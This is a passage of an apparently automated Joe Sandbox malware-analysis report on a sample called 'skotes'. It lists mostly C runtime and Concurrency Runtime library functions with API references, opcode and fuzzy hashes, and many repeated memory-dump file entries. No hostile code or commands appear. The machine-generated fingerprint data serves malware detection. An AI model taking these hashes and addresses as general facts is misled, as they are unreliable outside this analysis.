Associated: 00000006.00000002.3313023487.00000000004F4000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313292834.00000000004FC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313557778.0000000000501000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313712501.0000000000509000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313903846.000000000050A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314063316.000000000050B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314233348.0000000000513000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314233348.000000000054E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314922438.000000000057F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3315383384.0000000000580000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316156788.0000000000589000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316341586.0000000000596000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316515374.0000000000597000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_280000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error
String ID: RoInitialize$RoUninitialize$combase.dll
API String ID: 348560076-3997890769
Opcode ID: fe94c1c6d3368836e89658cd02f25dd9d4981a63c15fbbe68638c82c0207247d
Instruction ID: 1b34bfc8d95a7bb0e805d69f5e0791921d156518262ca346a03964cf4f0d1f41
Opcode Fuzzy Hash: fe94c1c6d3368836e89658cd02f25dd9d4981a63c15fbbe68638c82c0207247d
Instruction Fuzzy Hash: 280145205B93526BE701BBB15C45BAB318C5F0330CF21182EB540EB182EF34D8208AA2

Function 002A6E1C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61COMMON

Download Yara Rule

APIs

SafeRWList.LIBCONCRT ref: 002A6E73

Part of subcall function 002A4E6E: Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 002A4E7F
Part of subcall function 002A4E6E: List.LIBCMT ref: 002A4E89

std::invalid_argument::invalid_argument.LIBCONCRT ref: 002A6E85
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 002A6EAA

Strings

eventObject, xrefs: 002A6E7D

Memory Dump Source

Source File: 00000006.00000002.3297457709.0000000000281000.00000040.00000001.01000000.00000008.sdmp, Offset: 00280000, based on PE: true

Associated: 00000006.00000002.3296564843.0000000000280000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3297457709.00000000002E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3299138671.00000000002E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3299367462.00000000002EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3300307618.00000000002F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3301774924.000000000044F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302083816.0000000000452000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302546330.0000000000468000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302546330.0000000000473000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3304173393.00000000004A4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3304808458.00000000004A5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3305449229.00000000004AC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3305809725.00000000004B6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3306517544.00000000004CD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3306849998.00000000004CE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3307187321.00000000004CF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3308051969.00000000004D7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3309195394.00000000004E0000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3310844862.00000000004E7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312051088.00000000004E8000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312449400.00000000004EA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312808925.00000000004F3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313023487.00000000004F4000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313292834.00000000004FC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313557778.0000000000501000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313712501.0000000000509000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313903846.000000000050A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314063316.000000000050B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314233348.0000000000513000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314233348.000000000054E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314922438.000000000057F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3315383384.0000000000580000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316156788.0000000000589000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316341586.0000000000596000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316515374.0000000000597000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_280000_skotes.jbxd

Yara matches

Similarity

API ID: List$AcquireConcurrency::details::_Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorLock::_ReaderSafeWriteWriterstd::invalid_argument::invalid_argument
String ID: eventObject
API String ID: 1288476792-1680012138
Opcode ID: f4c07200de2ef1736e7b2dfa58491e02d27144aa408fe8857936e35a23014ad7
Instruction ID: 62b27e36e1c8c3ed0930ddc5055edb55f080ccecc8cd4c426c7fc3eb43e4f94d
Opcode Fuzzy Hash: f4c07200de2ef1736e7b2dfa58491e02d27144aa408fe8857936e35a23014ad7
Instruction Fuzzy Hash: 1011E575560205E7DF24FBA4CE4AFEEB3A85F02314F248155F505A61C1DF70AE24CA65

Function 002AA0EE Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35threadCOMMON

Download Yara Rule

APIs

Concurrency::details::SchedulerProxy::GetCurrentThreadExecutionResource.LIBCMT ref: 002AA102
Concurrency::details::ResourceManager::RemoveExecutionResource.LIBCONCRT ref: 002AA126
std::invalid_argument::invalid_argument.LIBCONCRT ref: 002AA139

Strings

pScheduler, xrefs: 002AA131

Memory Dump Source

Source File: 00000006.00000002.3297457709.0000000000281000.00000040.00000001.01000000.00000008.sdmp, Offset: 00280000, based on PE: true

Associated: 00000006.00000002.3296564843.0000000000280000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3297457709.00000000002E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3299138671.00000000002E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3299367462.00000000002EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3300307618.00000000002F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3301774924.000000000044F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302083816.0000000000452000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302546330.0000000000468000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302546330.0000000000473000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3304173393.00000000004A4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3304808458.00000000004A5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3305449229.00000000004AC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3305809725.00000000004B6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3306517544.00000000004CD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3306849998.00000000004CE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3307187321.00000000004CF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3308051969.00000000004D7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3309195394.00000000004E0000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3310844862.00000000004E7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312051088.00000000004E8000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312449400.00000000004EA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312808925.00000000004F3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313023487.00000000004F4000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313292834.00000000004FC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313557778.0000000000501000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313712501.0000000000509000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313903846.000000000050A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314063316.000000000050B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314233348.0000000000513000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314233348.000000000054E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314922438.000000000057F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3315383384.0000000000580000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316156788.0000000000589000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316341586.0000000000596000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316515374.0000000000597000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_280000_skotes.jbxd

Yara matches

Similarity

API ID: Resource$Concurrency::details::Execution$CurrentManager::Proxy::RemoveSchedulerThreadstd::invalid_argument::invalid_argument
String ID: pScheduler
API String ID: 246774199-923244539
Opcode ID: a0720835c4060218db43d9cd120ff064a77fc936c20978b726328c6785bc795f
Instruction ID: 66bf00fe145aab889cfb9683ee60d72033b555ef8146a7214ba6e77d49256e7a
Opcode Fuzzy Hash: a0720835c4060218db43d9cd120ff064a77fc936c20978b726328c6785bc795f
Instruction Fuzzy Hash: 06F0E935960204B7CB25FE54DC83C9EB379AE82754B608169E40957181DF70AE36CE92

Function 002C67A9 Relevance: 6.2, APIs: 4, Instructions: 245COMMON

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 002C6902
__alloca_probe_16.LIBCMT ref: 002C6998
__freea.LIBCMT ref: 002C6A03
__freea.LIBCMT ref: 002C6A0F

Memory Dump Source

Source File: 00000006.00000002.3297457709.0000000000281000.00000040.00000001.01000000.00000008.sdmp, Offset: 00280000, based on PE: true

Associated: 00000006.00000002.3296564843.0000000000280000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3297457709.00000000002E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3299138671.00000000002E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3299367462.00000000002EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3300307618.00000000002F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3301774924.000000000044F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302083816.0000000000452000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302546330.0000000000468000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302546330.0000000000473000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3304173393.00000000004A4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3304808458.00000000004A5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3305449229.00000000004AC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3305809725.00000000004B6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3306517544.00000000004CD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3306849998.00000000004CE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3307187321.00000000004CF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3308051969.00000000004D7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3309195394.00000000004E0000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3310844862.00000000004E7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312051088.00000000004E8000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312449400.00000000004EA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312808925.00000000004F3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313023487.00000000004F4000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313292834.00000000004FC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313557778.0000000000501000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313712501.0000000000509000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313903846.000000000050A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314063316.000000000050B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314233348.0000000000513000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314233348.000000000054E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314922438.000000000057F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3315383384.0000000000580000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316156788.0000000000589000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316341586.0000000000596000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316515374.0000000000597000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_280000_skotes.jbxd

Yara matches

Similarity

API ID: __alloca_probe_16__freea
String ID:
API String ID: 1635606685-0
Opcode ID: c2ab3b7447b0e1f4b07ad9bcd38b62c2149179e138d6a6af0c878c11d174716e
Instruction ID: a3c4d294cfcf7df28ca212793403036f7b2d37c4a9821ca90eba4653203b1ab8
Opcode Fuzzy Hash: c2ab3b7447b0e1f4b07ad9bcd38b62c2149179e138d6a6af0c878c11d174716e
Instruction Fuzzy Hash: 6381D072D20246ABDF219E648C89FEE7BB99F09354F18435DE805B7281D775CC24CBA0

Function 002B504E Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 002B5115
___AdjustPointer.LIBCMT ref: 002B5138
___AdjustPointer.LIBCMT ref: 002B51D4

Memory Dump Source

Source File: 00000006.00000002.3297457709.0000000000281000.00000040.00000001.01000000.00000008.sdmp, Offset: 00280000, based on PE: true

Associated: 00000006.00000002.3296564843.0000000000280000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3297457709.00000000002E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3299138671.00000000002E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3299367462.00000000002EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3300307618.00000000002F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3301774924.000000000044F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302083816.0000000000452000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302546330.0000000000468000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302546330.0000000000473000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3304173393.00000000004A4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3304808458.00000000004A5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3305449229.00000000004AC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3305809725.00000000004B6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3306517544.00000000004CD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3306849998.00000000004CE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3307187321.00000000004CF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3308051969.00000000004D7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3309195394.00000000004E0000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3310844862.00000000004E7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312051088.00000000004E8000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312449400.00000000004EA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312808925.00000000004F3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313023487.00000000004F4000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313292834.00000000004FC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313557778.0000000000501000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313712501.0000000000509000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313903846.000000000050A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314063316.000000000050B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314233348.0000000000513000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314233348.000000000054E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314922438.000000000057F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3315383384.0000000000580000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316156788.0000000000589000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316341586.0000000000596000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316515374.0000000000597000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_280000_skotes.jbxd

Yara matches

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: 11b156292c8f3786f8e6cc339dfafd62ca5b64e11e4ea9c87285b0b3f266f9bd
Instruction ID: fb16769e2cc75393958c8d3819b48fd7f43764b26bc4c53245ea43a3cfea7f26
Opcode Fuzzy Hash: 11b156292c8f3786f8e6cc339dfafd62ca5b64e11e4ea9c87285b0b3f266f9bd
Instruction Fuzzy Hash: F6510671531A22AFDB259F18D891BFA73A4EF14380F244529EC094F291E771ED61CB90

Function 002B4C15 Relevance: 6.1, APIs: 4, Instructions: 141COMMON

Download Yara Rule

APIs

TypeidsEqual.LIBVCRUNTIME ref: 002B4C66
TypeidsEqual.LIBVCRUNTIME ref: 002B4C8B
PMDtoOffset.LIBCMT ref: 002B4CA1
PMDtoOffset.LIBCMT ref: 002B4D22

Memory Dump Source

Source File: 00000006.00000002.3297457709.0000000000281000.00000040.00000001.01000000.00000008.sdmp, Offset: 00280000, based on PE: true

Associated: 00000006.00000002.3296564843.0000000000280000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3297457709.00000000002E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3299138671.00000000002E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3299367462.00000000002EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3300307618.00000000002F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3301774924.000000000044F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302083816.0000000000452000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302546330.0000000000468000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302546330.0000000000473000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3304173393.00000000004A4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3304808458.00000000004A5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3305449229.00000000004AC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3305809725.00000000004B6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3306517544.00000000004CD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3306849998.00000000004CE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3307187321.00000000004CF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3308051969.00000000004D7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3309195394.00000000004E0000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3310844862.00000000004E7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312051088.00000000004E8000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312449400.00000000004EA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312808925.00000000004F3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313023487.00000000004F4000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313292834.00000000004FC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313557778.0000000000501000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313712501.0000000000509000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313903846.000000000050A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314063316.000000000050B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314233348.0000000000513000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314233348.000000000054E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314922438.000000000057F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3315383384.0000000000580000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316156788.0000000000589000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316341586.0000000000596000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316515374.0000000000597000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_280000_skotes.jbxd

Yara matches

Similarity

API ID: EqualOffsetTypeids
String ID:
API String ID: 1707706676-0
Opcode ID: 7eba31bc2cdc899ce0d39c1d43e6a64f477002fbbb014f00cff841445868ded1
Instruction ID: d481b3ffb0359dd087c90465ce5f2520b0f7b7155bfaab0edff0bec2cfba6ef5
Opcode Fuzzy Hash: 7eba31bc2cdc899ce0d39c1d43e6a64f477002fbbb014f00cff841445868ded1
Instruction Fuzzy Hash: A1519B35A2420B9FCF11EF68C4C0AEEBBF4EF15394F14449AE850A7352D332AA15CB50

Function 002ADB30 Relevance: 6.1, APIs: 4, Instructions: 123COMMON

Download Yara Rule

APIs

Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 002ADB64

Part of subcall function 002A8F2F: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 002A8F50

Concurrency::details::InternalContextBase::FindWorkForBlockingOrNesting.LIBCONCRT ref: 002ADBC3
Concurrency::details::InternalContextBase::PrepareForUse.LIBCONCRT ref: 002ADBE9
Concurrency::location::_Assign.LIBCMT ref: 002ADC56

Memory Dump Source

Source File: 00000006.00000002.3297457709.0000000000281000.00000040.00000001.01000000.00000008.sdmp, Offset: 00280000, based on PE: true

Associated: 00000006.00000002.3296564843.0000000000280000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3297457709.00000000002E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3299138671.00000000002E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3299367462.00000000002EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3300307618.00000000002F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3301774924.000000000044F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302083816.0000000000452000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302546330.0000000000468000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302546330.0000000000473000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3304173393.00000000004A4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3304808458.00000000004A5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3305449229.00000000004AC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3305809725.00000000004B6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3306517544.00000000004CD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3306849998.00000000004CE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3307187321.00000000004CF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3308051969.00000000004D7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3309195394.00000000004E0000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3310844862.00000000004E7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312051088.00000000004E8000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312449400.00000000004EA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312808925.00000000004F3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313023487.00000000004F4000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313292834.00000000004FC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313557778.0000000000501000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313712501.0000000000509000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313903846.000000000050A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314063316.000000000050B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314233348.0000000000513000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314233348.000000000054E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314922438.000000000057F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3315383384.0000000000580000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316156788.0000000000589000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316341586.0000000000596000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316515374.0000000000597000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_280000_skotes.jbxd

Yara matches

Similarity

